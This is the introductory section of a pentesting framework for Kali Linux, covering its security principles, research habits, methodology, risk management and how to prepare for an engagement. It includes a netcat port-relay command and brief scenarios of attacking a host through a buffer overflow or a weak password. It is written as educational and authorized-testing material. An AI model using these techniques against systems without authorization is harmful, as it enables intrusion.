The Purple Files - A Pentesting Framework - 1Q23 © Copyright 2023 William Ben Bellamy Jr. wbbellamy@gmail.com This information is exclusively for my own use and those whom I authorize. Any violation will be punished to the full extent of my imagination. |
In this section you will become familiar with the different aspects of this page, how to best navigate through it, and the different core technologies that require some degree of skill in order to take advantage of the information and capabilities provided by The Purple Files.
This section will relate to all subsequent section by providing the background information necessary to best understand and apply the material presented here.
Note that while this project is Open Source, I am currently the sole developer. Suggestions and corrections are very welcome, but due to time constraints and directional objectives no additional coding support is being accepted at this time.
Be sure to check The Purple Files for updates at
Legend | |||||
Close an external page. | Pay attention to the point being made. | Additional, more detailed, information. |
Each of the main and sub titles on this page will turn green when you mouse over them, and back to white when the mouse is off off. Clicking will toggle expanding or collapsing of that topic. Any other title that is already open will be closed when a title is clicked opened.
Example commands. Examples are displayed as shown below. A single click anywhere on the command will copy the complete command example into the clipboard so that it can be pasted into a terminal window for execution, or into your notes, anywhere you can paste text.
Links to external pages are display as shown below.
List of files comprising The Purple Files
File Name | Description |
ThePurpleFilesOverview.html workspace/ documents/ ThePurpleFiles.html |
|
07-20.pdf Documenting.your.work.html HackerThink.html Linux.html MAC.html Methodology.html Password.Cracking.html PasswordCracking.html Resources.html Rules.of.Engagement.html TakingNotes.html Template.Pentest.Report.html UsingMetasploit.html netcat.html nmap.html unpacking.html |
Ben, flesh these points out.
In reality, there are two ways pentesting occurs. First in agreement with the target system owner. Second AdHoc. This framework is intended for the first, where you are providing a service for a client who agrees to authorize you to perform the tasks you have both agreed on, and in the way you both have agreed. This framework, though not intended, can also be used for ad hoc pentests. And while possible, it is not recommended or condoned. Each technique, idea, example or any other information contained in this framework is explicitly intended to be used legally, ethically, and in good faith. This includes whether this material is used simply for educational purposes.
One development goal was to include as much actual information as possible in an accessible format. For example, I did not want to simply list URLs to Internet based resources. Those resources can vanish both information and code. So in many cases I have collected that material and included it in The Purple Files so that the code is available for the tools I offer suggestions about.
The Purple Files dies not try to compete with any other tool or framework. It also does not attempt to be the most sophisticated. But it is intended to familiarize you with a process, associated tools, important concepts, and the technology you use and work within when performing a pentest. With this background and skill-set you will be much better positioned to move into much more complicated situations and deal with much mire sophisticated types of risk.
The Purple Files is an HTML based framework that provides both an introduction to pentesting along with an environment from which to perform pentesting.
It is assumed that you are running The Purple Files on a Kali Linux system. Actually, any mainstream Linux distribution should do as long as you have the required software installed. See the Tools Refereed To in The Purple Files section for details. By default, The Purple Files are not included with Kali or any Linux distribution. So, it has to be "installed". There is really no "install" process since The Purple Files is a self-contained webpage based "application". All you need to do from within Kali Linux is make The Purple Files directory branch accessible via having copied it to a local hard drive, having burned it to a CD or DVD, or having it available on a removable USB drive. You then simply open the ThePurpleFiles/ThePurpleFiles.html page in the Firefox browser within Kali Linux and you are ready to start using it.
Tools come and go. Techniques come and go. OSs and distributions come and go. That apparent lack of stability is at first unnerving, but it is actually health, and more importantly unavoidable. Change, growth, retrograde simply are the way of things. But principals endure. They may be more relevant in one era than another, more obvious at different time and in different situations, but they last long enough to be considered for our purposes enduring.
Consequently The Purple Files often focuses on purposes while devoting more screen space to commands, protocols, methodology, and examples. But it with a foundation of principals that your can seamlessly glide from one techno-nugget to another, to a replacement, and to a truly new thing.
The Purple Files does not try to automate very often but instead focuses on the processes that are going on, their rational, and how all of the different tasks fit together into a cohesive, efficient, and effective process. It makes you deal with the details rather than menus and shortcuts. This is analogous to using a word processor as opposed to writing skills. It is one thing to learn to use a word processing tool, and another to learn how to write. If you learn the tool, that becomes the only environment you are able to work with or in. If, however, you learn to write, you can write with any tool, including word processor, pen or pencil, chalkboard...
Because of this, there is no consideration given for certifications, no garentee that a given tool or example cannot be improved, replaced, eliminated, or simple left in place. The "practical" material in The Purple Files is transit. But the principals continue as a framework on which to place, expand, improve, replace, add, and remove.
The goals of pentesting are different than malicious intrusion.
These steps flow from one to the next and often overlap. In fact, you can jump to any other at times. But the point is that this methodology helps keep you on track and keep things from falling through the cracks.
One of the guiding principals of The Purple Files is to focus on framework, process, and goals. These are foundational to your efforts to improve and maintain a good security stance. Tools come and go, are useful or not, and evolve or stagnate. Tools are the tinker toys that can be fit together to realize your vision. Most often you do not use them all, some are cool but not helpful in the long run. And some are used over and over. When a better (and be sure you clearly defined what 'better' means) tool comes along you replace the old one and redo your procedures to fit it into place. But the place you fit it into (the methodology, which is the articulation and cohesive arranging of principals) seldom changes.
What does The Purple Files provide? Using a web interface (no web server required, in fact no Internet connection required either) The Purple Files provides a checklist that steps through a pentesting methodology giving examples of the tools and techniques that are helpful in addressing each step of the methodology. Information is included throughout the process describing each step, each tool, and the goal at that point. Detailed information is also provided for many if the concepts and principles that apply at each step.
Who is The Purple Files intended for?
♦ Hobbiest. People who are interested in learning more about and exploring pentesting and seeing how they can use these principles and tools to analyze and better secure their own systems, and those of family and friends.
♦ Students. If you are studying InfoSec, or wondering if it might be for you, you can use The Purple Files to explore the possibilities. While the tools and examples are useful, the information spread throughout the system will give you several levels of explanation and description that will help relieve what pentesting is about and how it's many steps and tool work together to better secure a system for use in the real world.
♦ Practitioners. Those who are working in information technology or InfoSec and want to begin to build security into the systems you work with, or use The Purple Files as the foundation of your existing procedures.
The Purple Files is not so much a tool as it is a framework. While there are many examples of the syntax for running many tools that are used in pentesting, the real focus of The Purple Files is to provide a framework that functions as a checklist, a reference, a text book explaining the process (methodology) in detail. Included are scripts that help automate portions of the process.
The majority of material in The Purple Files assumes that you are running Kali Linux in some way. Either as the only OS, as a VM inside another host OS, booted from removable media, and so on. Linux is assumed to be the primary OS you are working in, and Kali is the distribution. Windows, however, also has a large number of very useful tools for pentesting which are not easily available on Linux. For that reason, I am including examples of the more useful tools that are most practically run from Windows. I have not included examples of tools that are available for both Linux and Windows on the assumption that Linux is the preferable platform for this type of work given the two.
Unlike many of the tools available, The Purple Files does not actually launch any of the programs it covers. Instead, every tool is manually run by you.
The reason for this is that there is powerful value in being familiar with the details of the programs commonly used in pentesting, and in the underlying concepts, protocols, and behaviors of systems.
Automation
The are many products available and that attempt to automate the pentesting process. They make it seem like you "just need to press a button" and deliver a report.
There is a place for automation in pentesting, but only as a tool to reduce human error, sift through the large amount of information a pentest produces. The selection of tools, their combinations, when to use them, how to specifically use them, and finally how to determine what their results mean must be deliberate choices made by the person performing the pentest.
The process of pentesting has is such a potential of disrupting a system or network that you want a person operating the process rather than the logic of a program which does not take into consideration the uniqueness, complexity, and context of the systems being reviewed.
After all, maliciously attacking a computer system is a unique series of steps, trial and errors, assumptions, and extrapolations each time it is done. Malicious attackers often do automate portions of the process of identifying potential targets and weaknesses, but at it's core, pentesting is the is a person imaginatively, insight fully, and creatively reviewing the security posture of a system.
The Purple Files is intended to be used in the Kali Linux distribution. Kali provides a stable and feature rich environment in which to use The Purple Files. This minimizes the time and effort necessary to build a pentesting platform. In fact, Kali contains ready to use tools for many InfoSec practices and not just pentesting.
The Purple Files does not address how to install or configure Kali - that is left to you and your situation.
Installing The Purple Files simply involves copying The Purple Files directory structure to the root of your home directory and opening the main HTML page in Firefox. In fact, you could even copy The Purple Files to a USB drive and use it from there
Below are some of the topics I will adding to The Purple Files as time permits.
♦ More on Password cracking, both online and offline
♦ More on Password cracking, both online and offline
♦ Wifi scanning and pentesting
♦ More on Linux and its more useful tools and tricks
♦ Additional tools in Kali Linux
♦ Scripts to help automate portions of the methodology
♦ More online references
Before we get into the specifics of pentesting, technology, tools, commands, and so on. I want to take a little space here to sort of cut to the chase. To review the ground rules. To introduce the things I think matter.
Remember, everyday you work to learn things that are new to you, remain up-to-date on evolving issues, and synthesize all of it into a landscape you can travel confidently and effectively. But during each of those days there are hundreds of thousands of people working just as hard to develop, discover, or integrate the existing into the truly new. They will always be ahead of you. You will never keep up.
But that is OK, and again, it simply is the way it is. The best response, until a better response comes along, is to clearly articulate to yourself the areas you choose to focus on. The topics that matter to you, that will help you pursue your goals (also articulated), and ignore the rest that would only distract you. For the purpose of The Purple Files, pentesting and its associated topics/technologies are the topic to pursue.
The following are the principals I am referring to. They are very InfoSec oriented, while you will find unique lists of principals for every area of interest.
♦ New tools and techniques are constantly being released. Operating systems, Linux distributions evolve and mature, and existing technologies are constantly being combined to create new and hybread technologies that can each be used in ways not intended by the developers or users. It can be mind numbing. Still, applications are developed that hope to address most if not all of the security issues that the current way that technology is developed produces. "This app is all you need!" "That tool will take care of all your needs and problems!" The solution to creating and maintaining a strong security stance is always a new product, which of course comes with endless support and updates. Marketing takes the lead rather than a practical evaluation of best solutions. And the key truth is never recognized - that it takes trained, skilled, experienced people with an aptitude for information security to select the tools and approaches to securing a system, and to select or develop the tools necessary to accomplish it. Ok, maybe this is more of a rank than a principal...
♦ There is a principal in many martial arts and appears to come from Taoist philosophy which says, in effect, rather than build a large number of tools, build expertise in just a few tools.
The more tools you have, the more they will overlap in function and use. The more tools you have, the more you need to know about specific syntax, interpreting results, and behavior. The alternative is to master fewer tools including how to use them in combination with other tools. Of the 100 things we need a tool for, only 20 will occur frequently while 80 popup once in a while. So, put your efforts into the few tools that address the frequent issues, while being aware of or possibly familiar with the other 80.
This "being aware of" is something you need to do regardless. A new tool may be right for replacing an older tool, or may be the right tool for a problem that is moving into that top 20.
And let's face it, Turing to a tool that you are not that familiar with and having to quickly review it, its syntax, its input and output, what exactly you can do with it - all of this together is one of the core skills a pen tester needs to be very skilled and practiced in. It will always be the case that new tools will emerge, new conditions will be developed for which new tools are required, making it mandatory that you develop an ability to pull up a program you may never have seen before and quickly determine its usefulness and how to use it.
So have a toolbox containing a relatively small number if tools you can bring out and get right to work with. But also have another larger toolbox out in the truck that has the tools you don't often need, and may need to step back and remember or figure out how to use them in the case.
An important point here is that there is no one or two tools that will do it all for you.
Be sure to add your own to this list. With every new set of eyes, new things can be seen.
♦ Tech alone will solve security's problems
There is a constant flow of new software and hardware intended to address weak security issues. Vulnerabilities are patched, intrusion monitors are made more sensitive and insightful, and other mostly defensive options are marketed. Even new languages that do not create the so many potential vulnerabilities have been created.
Everywhere security components can be created or improved, for a price, they are.
The future of InfoSec is painted as being bright and optimistic. And that is good. We need to be optimistic, but I think we would be even better off if we also include a realistic dose to our out look.
Regardless of how strong our IT hardware and software might be, it is used, managed, and maintained by people.
The people-part of IT has been getting worse due to less opportunity for ongoing education and the growing and unmet demand for IT security staff.
And even if the demand for IT staff is met, it will remain the source of many major vulnerabilities.
♦ Default credentials
♦ Weak passwords
♦ Outdated software
♦ Security updates not applied
♦ Vulnerable "test" systems
♦ Security exceptions due to upper management demand or convince
The point is that however perfect a tool you put into use, it will be people using it. And even if your network and all of it's assets and components are as well secured as possible, there will be other networks you interact with that are not as well secured.
The more sophisticated a piece of software is, the more prone to misuse, abuse, and manipulation it is.
And this only considered non-malicious insiders. What about insiders with malicious intent?
When we perform a pentest, it may be focused on digital systems, but it is really the work of people who selected, installed, configured, managed, and operated. We are reviewing the work of others, not the integrity of digital components.
Better and more powerful tools will enter the marketplace, emergent threats and risks will continue, but people version 1.0 will continue to be the architects, managers and users of our digital systems.
So what are we to do?
Educate and Inform
Review and Analyze
Learn and Imagine
As long as people use technology, some will abuse it, and use it maliciously. To counter this, other people must use technology to manage that risk.
♦ Internal is External
We tend to think that because "all of the bad folks" are out there on the Internet, that is where the risk comes from. And there a small number of people, all of whom we trust, inside our systems. So the majority of the risk must external.
However, this does not take into account the malicious insider, disgruntled employees, vendors who have an internal presence, or friends and relatives that employees bring into the network.
To confuse things further, an external attacker will often gain an internal foothold from which to work. So you have external attackers internally. The whole external vrs. internal way of thinking tends obscure the actual location from which we can be attacked along with the attack vectors we need to be aware of and guard.
♦ Critical Systems
Organizations classify their systems and resources based on assumptions that are not shared by attackers.
"Our XYZ site gets the most hits, so we have to secure it." "That host does not accept any Internet based connections, so it is safe." "Those files are password protected, so we do not need to protect them as if they were unencrypted."
There are several such misconceptions about what attackers are actually after that began in the media and has been incorporated into organizational culture.
SSNs, passwords, emails... These are the types of digital assists that most people assume is an attacker's is interested in. And sure, these obvious types of material can be the targets of attack. But there are other digital assets that are the goal of intrusion. It is important to understand that any type of material or resource is an attractive target to someone. We are often the worst judge of the value of the material and resources we have.
All systems must be considered critical. A given host may not house what most would consider important material, but:
♦ every host is a stepping stone to all other networks and hosts
♦ every host offers processing horse power that can be used however an attacker wishes
♦ every host offers disk space that can store anything an intruder decides to store
♦ every host can be used to provide anonymous or covert communications
♦ every host can be used as a distraction from the real attack
♦ every host can be used as a proxy to obscure identity, location, and so on...
Another way to state this principal is that "you often do not know what an attacker wants from you."
Organizations are quick to protect what is important to them, and that makes sense. But they fail to then protect resources that are perceived less valuable on the assumption they are less value to attackers also.
For example, we provide less protection for a print server than a database server. When in fact, an attacker might see a printer as a great platform from which to further an internal attack. Not to mention that printers can be a source of information in the form of SMTP services, user names, previously printed or faxed documents, and so on. To make matters worse, printers often run a very cut down version of Linux with much of the securing functions removed. Not to mention that printer firmware is seldom updated, so vulnerabilities that have been repaired for years may still exist on printers.
However, an attacker may be after processing horsepower rather than our data. In that case, the print server is a better target since its CPU sits idle most of the time, and high CPU utilization is less likely to be noticed on a print server than a database server.
Read the "Attacker's Motivations (Doc)" paper, listed on the TOC page, for a more in-depth discussion on this topic.
♦ Research. Finding one or more authoritative and adequate answers to a specific question.
I have been amazed for years how often people ask me questions. Sure there have been lots of simple quick questions that I was likely to know off the top of my head, and that looking elsewhere would take significantly more time and energy - that is no problem. In fact, any question is not a problem. Easy questions, hard questions, complex questions, dumb questions (I have not seen any of those yet...), all are legitimate. But what amazes me is that it is not more natural for people to research and figure it out for themselves.
Throughout The Purple Files you are likely to have questions. The questions can be specific, ie "what is the parameter to more verbosity?". They can also be general such as "How dows RAID work?", or "What are the TCP flags used for?" In either case, those types of questions should popup throughout The Purple Files, and every other instance of "doing tech" you run into. While reading an article you come across a term that is unfamiliar or that you have only a very basic understanding of, and you want to know more so you can better understand what you are reading. You are day dreaming about some problem and wonder if there is an xyz tool or technique that would do this or that and work to solve that problem. Or when you see something that looks out of place, you wonder if it might be an indicator of something bad, no nothing at all.
When these, or a thousand other ways to describe the need or desire for more information, occur, you need to be able to rely on strong research skills. As I said, throughout The Purple Files and everywhere else, these questions will popup, and they are opportunities to practice the critical skill of research.
So, how do you go about do that reach thing.
Google (duh!). Start with search engines including Google, Bing, Yahoo, and so on. These general purpose indexes are great for at least getting started. But, there is an art to this type of searching.
Focusing on Google, you want to first determine what unique words, phrases, numbers and so on are associated with potential answer bering pages.
Suppose you are given an error number for a specific program. You would want to search for that program name, its version, the word "error" and the error number. Remember you are looking for information that someone else has written while discussing that specific error. So you want to include words that not only identify that specific error and the environment in which it occurred, but also include words or phrases that that other writer would have used.
Assume you are poking around an email server and get a 552 error message. You could start by searching for "smtp error code 552". That would lead you to specific information.
Suppose you have a target that accepts traffic only from a specific TCP port number. How do you do that? Start by searching for "Sending traffic from a specific tcp port". At first you get information on programming sockets and information about ports, but nothing helpful. So lets try tweaking the query to "sending tcp from specific port". That lists a link to a page titled "How To Use Netcat to Establish and Test TCP and UDP Connections ...". Netcat, that's good - we love netcat! That page talks a lot about using netcat to send and receive as both a client and as a server.
That gets you to thinking... Netcat can send and receive, of course. And that is what a proxy basically does, but a proxy itself always sends from a static IP/port (also called a "socket"). So you search for "using netcat as a proxy". After checking several of the results pages I notice that rather than proxy, the word "tunnel" looks more like what I am looking for. So I change the query to "netcat tunnel". That leads me to a stackexchange page that has an example.
So using that example I setup a tunnel on my local host to listen on port 8001 for inbound connections, and to reroute them outbound to www.google.com:80. But by adding the "-p 31337" parameter, I can designate the local port that nc will use when communicating with google.com. "$ sudo nc -l -p 8001 -c "nc -p 31337 www.google.com 80", and that seems to work! In this case, if I want to be completely sure, I would repeat this example while recording the network traffic using tcpdump or wireshark, and then review to traffic to verify the sockets being used.
In addition to this type of googleing, I would also search sites that deal with this type of information, such as stackexchange.com. I would also check in the books and magazines I keep at hand and use as reference material.
♦
There is a principal in many martial arts and appears to come from Taoist philosophy which says, in effect, rather than build a large number of tools, build expertise in just a few tools.
The more tools you have, the more they will overlap in function and use. The more tools you have, the more you need to know about specific syntax, interpreting results, and behavior. The alternative is to master fewer tools including how to use them in combination with other tools. Of the 100 things we need a tool for, only 20 will occur frequently while 80 popup once in a while. So, put your efforts into the few tools that address the frequent issues, while being aware of or possibly familiar with the other 80.
This "being aware of" is something you need to do regardless. A new tool may be right for replacing an older tool, or may be the right tool for a problem that is moving into that top 20.
And let's face it, Turing to a tool that you are not that familiar with and having to quickly review it, its syntax, its input and output, what exactly you can do with it - all of this together is one of the core skills a pen tester needs to be very skilled and practiced in. It will always be the case that new tools will emerge, new conditions will be developed for which new tools are required, making it mandatory that you develop an ability to pull up a program you may never have seen before and quickly determine its usefulness and how to use it.
So have a toolbox containing a relatively small number if tools you can bring out and get right to work with. But also have another larger toolbox out in the truck that has the tools you don't often need, and may need to step back and remember or figure out how to use them in the case.
An important point here is that there is no one or two tools that will do it all for you.
♦ Ben, in some instances where a word or term of art is used (like 'term of art'), you can place an online explanation or definition, or you can recommend that the person refer to a specific online resource, research/Google for more information. You can answer a man's question and he will have one less question. You can teach a man to google and all answers will be his.
♦ There are many products available that promise to do all that is truly necessary with a simple click of a button. They are expansive, cover wide topic ranges, provide continual updates and support, and typically very expensive. Their marketing is directed first to upper management. They know that convincing those who can green-light projects and authorize expenditures to invest in the product is the actual goal. Providing enough technobabel, charts, testimonials and so on will go a long way in persuading those with the checkbooks that this is the best way to accomplish their agenda. Include convincing language in reports that they have the insight to recognize when others did not that this investment will solve the security problem. The marketers also target technical management who need to accomplish more, avoid disruptions, reduce or eliminate spending on software and training, and also make their reports read favorably. There is also comfort in thinking that they have solved the rank-in-file's complaints for better tools and training.
OK, that was a bit snarky, but there is a hint of reality there.
Rather then try to do everything for a pentester, automate all tasks, gen up canned reports with plenty of graphs, and do it consistently, The Purple Files instead focuses on laying out the practical skills, insight, and procedures that an effective pentester will need. Most people can be trained to use a all-in-one application to end up with a report that gives the illusion of a comprehensive security stance. But the truth is that only an InfoSec professional who is familiar with the environments they will operate in, is aware of how each step is performed, why each step is preformed, is familiar enough with the environments and tools to spot unusual conditions, to be able to probe deeper and in different directions, imaginative and skilled and curious enough to follow a hunch will be able to deliver on the expectation of assessing a system's security stance and then effectively communicate and advise on the ways to correct or improve each issues that has been identified.
True, this type of super-pentester, should also make use of any all-in-one tools they have access to. The point is to understand the environment the tools are analyzing, understanding the results, verifying both the results along with other situations they might indirectly imply.
Consider this situation. A pentester identifies a weak or default password that give them at least read access to the filesystem. That alone is very significant, but may not be the end of the finding. Assume this is a Windows system and you are able to traverse directories into the system32 directory. There you list all of the files and directories, maybe just to get a screenshot proving you had gotten to this point. But you notice a directory named ".etc". None of your tools raise a red flag. But you are familiar with both Windows and *nix. You know that ".etc" is not a standard or common directory. In fact, you probably have never seen that directory name anywhere. But you are also familiar with *nix and know that "etc" is found on most if not all *nix systems. You also know that preceding a filename or directory name with a dot makes it "hidden", and "etc" is never "hidden".
That type of familiarly would lead you to drop into that directory and investigate. Chances are you will find proof of a major intrusion that uses "hidden" directories with common names are a place to stash files and run operations from the inside.
♦ Attackers, along with most people, would rather expend less energy and time on a problem when possible. There are usually many ways to solve a given problem, and the art is in quickly finding the solution that takes the least amount of time and energy. There is trade-off in determining the "easiest" solution, so balancing the time and effort it takes to determine the fastest and easiest solution helps determine the optimal solution. In other words, you do not want to spend an hour determining which 1 minute solution is best.
You want to approximate your ROI for a given problem. And in the approximating you emphasize the ease of the solution over duration, number of steps, resources, and even the time required.
But be clear that there is no laziness involved. This is about efficiency and productivity.
Follow the path of least resistance. Consider these two scenarios. Given that you want to attack a organization's database in some way.
You can choose to attack the host directly. Attempt to identify the software make and model, and then craft a buffer overflow for your attack payload which will open a backdoor through which you can run SQL queries on the actual data.
You can also choose to attack the host indirectly. First compromise the CISO's assistant through a weak password compromise. Then using their credentials query the data.
Both approaches could work. But while the first involves several steps with varying degrees of difficulty, the second is less complicated and faster.
♦ You Do Not Know How What You Show Can Be Used Against You
You are a developer, and you have a name. (search discussion forums, product forums, google for the name and agency/KY/Frankfort/...)
An error message can disclose the name and version numbers of a product. (Google for the default credentials and know vulnerabilities)
The name of an actual executable might be disclosed. (google for the developer's manual and find out what parameters you can pass to the app)
♦ Knowing A Technique/Tool Exists...
The best way to become familiar with a Linux program, in this case nikto, is to first read the man page to get a feel for what the program does and what functions it provides. Then find examples such as the illustration below and reference the man page to identify the details of each parameter and the alternatives. This will give you a clear idea of what is possible. You do not need to memorize all the parameters and possibilities, you simply need to know that a thing can be done. Knowing something can be done you would review the syntax page and man page for the details. And if you do not know a thing can be done, at least you will have an idea of which programs might do it and can refer to them.
♦ Attackers Are Patient
♦ What You Think Is Impossible Is Done Daily
♦ Attackers Have Better Tools And More Knowledge
♦ If Your Computer Contains My Code, It Is No Longer Your Computer
♦ People Want To Help
Even intruders have a desire to "help" 8-)
The reason that social engineering works is not because people are stupid, naive, or foolish. It works because fundamentally people want to be helpful. They want approval, and to feel needed and important. People switch from someone elses artificial procedures of operation over to whatever it takes to meet a need, answer a question, or solve a problem. We are hardwired that way.
While the propensity to want to help is admirable, it can be taken advantage of. The only gating factor is education that takes a hold. Doing an online course is cost effective, but does not translate to effective safe behavior.
While we focus on the actual code, configurations, and other components that are in place, actual attackers include the social engineering
•"It Does Not Matter If My App Is Hacked"
Customers often believe that their simple application does not warrant any security considerations, usually because;
•It does not use confidential data -
In reality, confidential data is not the only thing attackers are interested in. Every application, networked or not, represents one or more vectors that offer any number of values to an attacker. In some way, every app represents a stepping stone closer to something of value to an attacker.
•Only a few people use it -
The number of people that are intended, expected, or believed to use an application has no baring on the value that compromising that app represents to an attacker.
•We can recover quickly -
You may be able to recover quickly, the the damage is still done whether it is recognized or not.
•No one would be interested in it -
Again, every app is another potential piece of the puzzle. Fit together enough of the pieces and you have a clear picture of your actual target.
•There have never been problems before.
•There have never been problems that were recognized or noticed.
This mindset also hides the fact that as an app within an enterprise, its security condition reflects on every other application. If you have one house on fire in a neighborhood, you are at risk of the fire spreading throughout the while community.
♦ Hacker Think
They say that magic is all about misdirection. Well here is a little trick that illustrates the magic in "hacker think".
I do not know how many times I have sat down at someone's desk to do something, looked under the keyboard and found a post-it note with a password written on it.
So, I take a post-it note, write a complex string on it that looks like it could be a password and put it under my keyboard. I can just image someone finding that and wondering just what they could do with my account, and off they go. All the while I am wondering how much time they would waste with that misdirection.
It is silly and simple, but still an interesting example of thinking in different ways.
There have been occasions where I really did have to write a password down. In those cases I would end the password with 3 spaces and not indicate that on paper. Kind of like salting a password. Again, silly and simple, but an interesting example of "hacker think".
Notice that in both cases you take a look at how people generally behave. Then look for ways to turn that to your advantage (being more secure). And finally, you do not rely on one mechanism. Effective security is comprised of layers of controls that together defend against intrusion to the point you can accept the risk.
Likewise, hacking is often about combining layers of technique to accomplish a task.
♦ Tinker Toys
In tech, and many other areas, everything is made up of "building blocks" - atomic items that cannot be divided down into more simple things (we like to think). And it is the creative, imaginative combining of these items into structures that create systems and solutions.
In the world of tech, it seems that every few months "they" come up with something "new". A revolutionary widget that ingeniously solves problems that were otherwise intractable. The problem is that the majority of the time, that is just marketing rather than invitation.
The building blocks, tinker toys, that are used to build tech solutions, products, concepts are usually new combinations of well established building blocks. Everything relies on the relatively small collection of items that make up our building material.
Of course the building blocks are often improved upon and enhanced, but their fundamental structure remains the same. The little round wheel with holes around it get a couple more holes added or is made thicker. The sticks with the slots at each end come in new colors and lengths. But they are still wheels and sticks, and they still interact the same way.
Think of a "new" tech product or item. Chances are it is simply the latest evolutionary step of a collection of well established components being combined in new ways or enhancing the structure's function.
Actual new technologies are few and far between. For example, quantum computing is a whole new collection of very odd building blocks. They bare no resemblance to existing technologies, operate entirely differently, and solves equations in some cases before they are calculated. This will require an entirely new skill set, paradigms of how/why things are done and why... It will be more momentous then the transition from industrial steam power to an electric powered society.
♦ There Is Nothing New Under The Sun
This is taken from Ecclesiastes. The idea here is that there is seldom a actually new technology is introduced. The majority of new stuff consists of the re-use of established technologies for new and different purposes, or a new combination of established technologies. The good news then is that you do not need to waste time on all of the new "revolutionary" products when you see them as simply new twists on established technologies.
For those new things are that pertinent to what we do or of interest for some other reason we can review a new thing to identify how it varies from its predecessor components or unique uses.
Traditional pentesting is the process of identify and leverage an attack vector that would lead to an compromise of the targeted host. There is the assumption that, given time, a host that has been compromised it can serve as a platform from which all of its components, neighboring hosts, the entire network can be compromised.
In contrast, a less-invasive review that simply identifies a system's characteristics, components, and potential security issues is a Vulnerability Scan. With a Vulnerability Scan, no intrusion need be demonstrated, instead as many vulnerabilities as possible are identified and remediated before they can be maliciously taken advantage of.
Ben, there are two methodology html files in ./documents. These need to be merged.
A Methodology consists of the procedures that are to be followed so that the results are consistent, and so that results are produced that are digestible and actionable for the client. The methodology used in this project leads you through the process of pentesting in a way that is organized, comprehensive, repeatable, and that leads to an accurate risk assessment of the host(s) in a given engagement. For more information, click the books icon to the right.
Pentesting has been an exercise in establishing a remote shell on the target host, escalating your privileges, and then finally creating a backdoor into the compromised system for subsequent covert activities. But pentesting has evolved and we believe the approach laid out here is more useful, beneficial and safe.
The goal is to identify most/all of the vulnerabilities on the target host, which can, alone or in combination, constitute a risk. We then verify our findings, all the while developing a report containing the issues that were found along with information that will assist the client in addressing those issues. Any other requirements stated in the engagement agreement should also be performed. This is as explained further in the Preparation section.
It is worth saying that communicating with the client(s) the fact that there is always a risk of disruption. The steps taken, the tools used, and how they are used are selected and used in such a way that the risk of disruption is minimized. However, with every host and network it is possible that the hardware, software, and/or configuration contain errors, bugs, or other mistakes that might cause the otherwise safe and reasonable use of these tools disruptive. To minimize that risk, we clearly communicating to the client their responsibilities in preparing for the pentest, our responsibilities for avoiding disruption, and what to do if some type of disruption does occur.
It is critical that you record your observations and findings as they occur. Click on the book icon to the right for more information.
Not every example in The Purple Files must be used in every engagement. This page covers the majority of commands and tools likely to be employed in an engagement, but each engagement is different. Think of The Purple Files as a toolbox - most of the tools and their user manuals are included, but there is always some other tool or technique that can be helpful. Make sure that over time you customize your toolbox to contain the best tools for each job.
Use each command only if you clearly understand its purpose, why you intend to use it, and what effects can you expect it to have, and what effects might indicate a problem. And never use any of the tools or examples shown here unless you are properly authorized.
Pentesting is often thought if as an effort directed entirely at a specific host for the purpose of compromising it's security. Think of "capture the flag" games. In reality, the path to unauthorized access to a system or resource usually runs through two or more associated hosts.
While a pentest engagement often is focused one a single host, the pentest process should include potentially all aspects of the target, it's network, and all hosts in it's domain. Often, either the actual attack vector or information that leads to an intrusion can come from peer hosts. So, when pentesting a specific host, you will often perform cursory scans, probes, and queries of associated hosts.
The Purple Files is designed to focus on a single host. However, throughout the methodology presented by The Purple Filed includes specific steps that enumerate many of the adjacent hosts.
There is only limited value in reviewing a single host even if it contains whatever is considered the client's most valuable asset. That host/asset maybe the end game for an attacker or that point the client is most concerned about, but a realistic review must include at least cursory reviews of any host that is likely to play a part in compromising a given host or resource.
Ben, explain the values of pentesting
Pentesting, and security in general are all about Risk Management (which is a topic you should spend time researching and becoming familiar with). Risk is "the potential of loss, harm, and/or disruption due to internal and external forces and/or conditions both intentional and unintentional."
You cannot eliminate risk, but you can manage it. You manage risk by:
♦ Reducing risk
♦ Transferring risk
♦ Avoiding risk
For example, reduce risk by keeping software patches up to date. Transfer risk with insurance or sub-contracting. Avoid risk by removing unnecessary network services (FTP, Telnet, chargen, motd...).
There are many advantages that attackers have over defenders.
First, attackers are much more patient. You may have an intrusion detection system (research IDS to see where they can be placed, how they recognize malicious behavior, and the ways that they can be defeated, or better circumvented) that is configured to block port scans. Fine, you can now sleep at night - at least until you get the midnight call that your systems have been hacked!
The goal of this section is to provide a way to customize the examples illustrated throughout The Purple Files to each engagement, prepare your host (laptop, desktop...) for performing an engagement, and how to best record your activities during an engagement.
The information covered in this section will be used throughout the remainder of the application.
Note that as discussion of each engagement begins, you should begin documenting (with lots of datetime stamps) your activities, understandings, suggestions and so on. This is a key part of preparing for dealing with problems during and after an engagement.
This is a good time to point out that some of your engagements will not be pleasant. Customers will misunderstand something, expect something not agreed to, perceive damage or disruption to their systems when there is none.
You will not be able to recreate the necessary information/proof that you acted properly or that you are not responsible for perceived damages. So it is critical that you begin recording as much information as you can that will be definitively helpful in those cases.
The types of information you want to record include;
Importantly, make sure to include a datetime stamp for each item.
All of this material (the files) should be escrowed in some one. For example, email encrypted copies to yourself. Then move them to an email folder for each engagement. This shows that a disinterested third party has had the material beginning at a specific date/time and that you did not have access to alter it without leaving glaring indications that the material has been altered. Also, if there is any question, your email service and provide backups from when the material was sent/received to verify the material and the date and time.
My process is to put copies of the engagement documents in a directory named workspace. Most importantly, a text file named something like Engagement-Title.Notes.txt
Then as I am doing ANYTHING, or have pertinent ideas, observations, or take any action I make a note about it in this text file while preceding each note with a datetime stamp. I of course use a Programmer's Text Editor like Notepad++, Sublime, or Geany. These allow for shortcuts for inserting datetime stamps, and all sorts of text manipulation features that make this process much easier.
There are several files/documents located in the documents/ directory that can assist during an engagement. Below is a list of those files and their purposes.
The Rules.of.Engagement.html file lists the detailed tasks that must be addressed before an engagement can begin. Open and print that page, fill it out by hand, and retain it. Click on the file icon to the right to open the Rules of Engagement page.
Notes.txt - Used to take notes during the engagement to help the operator keep track of tasks and format material to be copied into the report
Rules.of.Engagement.doc - The details checklist to be filled out in the preparation stage of the engagement
Template.Pentest.Report.doc - The final report template which includes the Target Profile.
Throughout the engagement and remediation stages these files are used to manage, organize and document this engagement.
Time frame:
of active queries and attacks. Passive queries can be performed at anytime. When the active tasks can start and how long the engagement will run.
Backups:
The client will create backups of the system(s), data, applications, configurations and all else that is needed to recover from an unexpected destructive event.
Potential Disruption:
